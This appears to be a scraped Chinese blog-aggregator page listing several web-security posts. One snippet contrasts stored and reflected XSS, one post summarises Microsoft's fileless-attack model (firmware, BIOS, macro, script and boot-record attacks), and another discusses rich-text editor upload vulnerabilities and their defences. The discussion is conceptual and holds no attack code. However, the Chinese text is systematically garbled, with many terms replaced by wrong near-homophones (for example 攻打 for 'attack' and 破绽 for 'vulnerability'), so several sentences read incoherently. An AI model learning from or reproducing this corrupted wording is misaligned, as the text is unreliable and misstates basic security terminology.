反射型和存储型的区别存储型XSS,长久化,代码是存储在服务器中的,如在个人信息或发表文章等中央,退出代码,如果没有过滤或过滤不严,那么这些代码将贮存到服务器中,用户拜访该页面的时候触发代码执行。这种XSS比拟危险,容易造成蠕虫,偷盗cookie等 ...

December 31, 2020 · 3 min · jiezi

关于web安全:浅谈无文件攻击

这些年无文件(Fileless)和不落地(Living off the Land)攻打曾经十分风行,简直成为攻击者的标配。现实的无文件攻打是只存在于内存中的后门,网络上有很多无文件攻打的验证性代码,比方最早的powershell downloadstring,近程文件是被当成字符串间接下载到powershell过程内存中执行,而后倒退到利用mshta、rundll32等执行脚本的各种奇技淫巧,再到当初风行的各种.NET assembly托管代码注入技术,当然还有一些齐全脱离操作系统的高端无文件攻打。而微软有一个无文件攻打模型可能十分好的解析这些无文件攻打,我给大家做个简略的参考解读。 攻打模型按磁盘文件的流动将攻打分成了3个类型 Type1,没有任何的文件流动。简略说就是攻打流动没有任何的磁盘文件落地和磁盘文件的操作行为,个别这种攻打的施行都脱离了操作系统,是由更下层的硬件固件和软件层发动的。Type2,没有磁盘落地文件,但通过文件间接流动,恶意代码个别通过白文件间接加载到内存中执行。这类攻打恶意代码的载体大多数都是脚本,通过程序命令执行,也有通过磁盘疏导记录等特定机制的执行。Type3,须要操作文件进行流动。比拟容易能了解的意思是恶意代码变成了数据,利用文件相干的程序破绽或性能个性将歹意数据转换为恶意代码执行。接着是颗粒度更细的分类描叙,是基于被攻打宿主**进行的分类 破绽攻打,基于软件和操作系统安全漏洞的无文件攻打 基于文件(Type3)各种各样的office、flash、java破绽文件和浏览器破绽,个别都是通过歹意文件触发破绽使文件解析引擎、浏览器等执行恶意代码,通过shellcode间接在内存中执行恶意代码。 基于网络(Type1)永恒之蓝是个好例子,间接通过网络协议的近程代码执行破绽来执行恶意代码。 硬件攻打,脱离操作系统的无文件攻打 基于设施(Type1)通过网卡、磁盘固件执行恶意代码,经典的如方程式的KillSuit,基于硬盘固件、磁盘疏导区执行恶意代码。 基于CPU(Type1)CPU本人自身也会有子系统,比方被白金革新的Intel cpu的被动治理技术(AMT)后门。 基于外置USB(Type1)USB能够外接的设施类型很多,比方最常见的模仿键盘和网关的badusb设施。 基于BIOS(Type1)主板BIOS能植入恶意代码大伙也是耳熟能详了,象往年eset发现的LoJax Rootkit,通过革新 BIOS固件中的防盗性能植入的后门。 基于虚拟机管理层(Type1)这是属于上帝视角的攻打了,虚拟机管理层执行恶意代码,曾经脱离虚拟机操作系统之外了。 执行和注入,无文件攻打执行恶意代码的常见模式 基于文件(Type3)从执行代码的角度看,这是无文件攻打最根底的执行向量,能够是可执行文件、dll、lnk快捷方式、打算工作等,它的攻打过程通常是将恶意代码近程注入到其余过程或加载到本身过程内存执行。 基于宏(Type3)office文档相干的宏脚本,这是基于office文档类本身的脚本语言,在office过程中执行恶意代码。 基于脚本(Type2)基于js、vbs、powershell脚本执行恶意代码, 这个就不再赘述了,大量的零碎程序都有各种奇技淫巧能执行歹意脚本。 基于磁盘(Type2)通过磁盘的疏导记录执行恶意代码,歹意的mbr、vbr都在这一类外面。 以上就是这个攻打模型的大体状况,这个攻打模型将古代安全软件要应答的刁钻攻打展示得一览无遗。咱们能够看到微软在攻打模型和攻打知识库方面的确是业界标杆,我想不是一线技术专家,很难做出这样的攻打模型,一个平安产品所要经验攻防的点,是没有接触过攻防的人难以想象的。 参考: https://docs.microsoft.com/en...

December 4, 2020 · 1 min · jiezi

web安全资料总结

前端平安系列(一):如何避免XSS攻打前端平安系列之二:如何避免CSRF攻打?

July 13, 2020 · 1 min · jiezi

Web-上传漏洞及防范

2020 年不太平,各种牛鬼蛇神轮流退场。可能有点忘乎所以,不知哪句评论错了,被知乎封禁了一周。还好,沉着一下,再不参加zz相干的话题了。 说回正题,作为码农,网络安全始终以来是个麻烦。最近,在我司保护的一个很旧很旧的网站上,发现有人通过富文本编辑器用的上传接口,偷偷上传了一些不良内容的网页文件。 通常,咱们应用富文本编辑器,以便用户能够公布图文混排的内容,甚至许可增加点附件。但不便的同时,也带来了一些安全隐患,如程序员比拟相熟的跨站攻打、点击劫持等。上传,尤其是容许上传 html 文件,这个危害是十分大的。首先,既然是 HTML,意味着可嵌入任意 JS,跨站攻打、点击劫持天然不在话下;其次,如果您的网站在搜索引擎排名不错,对方可通过 SEO 的模式,将您的网站变成一个倒流通道;如果您的网站波及zf相干机构,对方放点黄赌毒内容,也会重大影响到某些单位的形象。 好在大部分富文本编辑器默认只提供插入图片性能,给出的服务端上传示例代码,也限定为仅反对上传图片。但也有一些性能较全的富文本编辑器,默认提供插入附件的性能,上传代码可能反对 pdf/txt/html 等浏览器可预览(执行)的文件类型。咱们网站用的某款编辑器是 5、6 年以前退出的,始终也没降级,而新版编辑器早已移除默认的 html 类型。 先来说下如何利用富文本的上传破绽往网站上传文件。富文本编辑器插入图片、视频、音频、附件,理论插入的是图片、视频、音频、附件的网址,包裹为 <img><video><audio> 等 html 标签。要么间接给一个网址,要么上传后返一个网址。对于后者,服务端须要给出一个接口,提供上传文件性能,并返回文件存入服务器后的网址。以此来看,入侵者齐全不用管前端富文本编辑器的逻辑,间接利用上传接口,上传文件、拿到网址。 这要如何防备呢?咱们曾经晓得了,入侵者基本不必管你前端用的什么编辑器、JS如何配置,他只须要探查到你的上传接口即可,因而,任何在前端限度不可插入资源都是有效的。进攻方面,我认为有几点,各有利弊: 1、防盗链,为上传目录的申请加个过滤层,当程序发现 referer 不是您的域名时阻断,防止外链造成恶劣影响。这显然防止不了不良内容呈现在站内。 2、临时文件,插入时先将文件上传到长期目录,待提交后内容校验通过,再转移到目标目录,同时替换内容中的网址。长期目录内文件超时主动删除。 3、图文拆散,彻底摈弃富文本,或富文本仅能调节文字排版,图片、附件等用额定的字段存储,也就是说,文件与表单数据是相对捆绑的,表单校验不通过,入侵方就不可能拿到文件网址。 4、文件转码,图片间接转为 base64 文本,利用 <img src="data:image/png;base64,xxx"/> 的模式与内容混合在一起;如果是图文拆散模式,可将文件存入对应的 Binary 类型字段。这也是保障文件与表单数据捆绑,便于发现,更易封禁。毛病是占用数据库空间,也不便于间接应用支流 HTTP 服务的缓存性能。 以上后 3 条仍然须要人工审查。现如今也呈现一些 AI 内容审核的货色,但训练是件麻烦事,小企业在这方面消耗大量人力物力就得失相当了。而阿里、百度等也有提供内容审核方面的接口,文本、图片均可,有些接口查看速度达毫秒级,齐全能够封装到服务端的表单校验逻辑里。当然,天下没有收费的午餐。如果您的内容齐全由内部人员保护,只用躲避偷偷上传,限度某类用户可用,就够了。 本话题由富文本编辑器引起,那么,是否不必富文本编辑器就高枕无忧了?从技术上来说,只有您的网站凋谢或半凋谢上传,仍然可能存在被上传不良、黑链等内容的图片、文件,依照现行法律法规,这些文件只有在您服务器上,就脱不了干系,只是会不会被发现的问题。 以下面第 3 条为例,图文拆散,当经营人员发现有个图片内容不良,他删除了此条数据,或标识为不公开,内部无奈再浏览,通过条目ID关上也显示不存在或不可见,但对个别编程习惯来说,文件可能仍然保留在原处。毁坏的一方仍然能够利用审查前拿到的文件网址,持续通过内部网页指向您的服务器。哪天那个黑站被端了,发现那些资源还都存在您那,冤不冤呀!

July 12, 2020 · 1 min · jiezi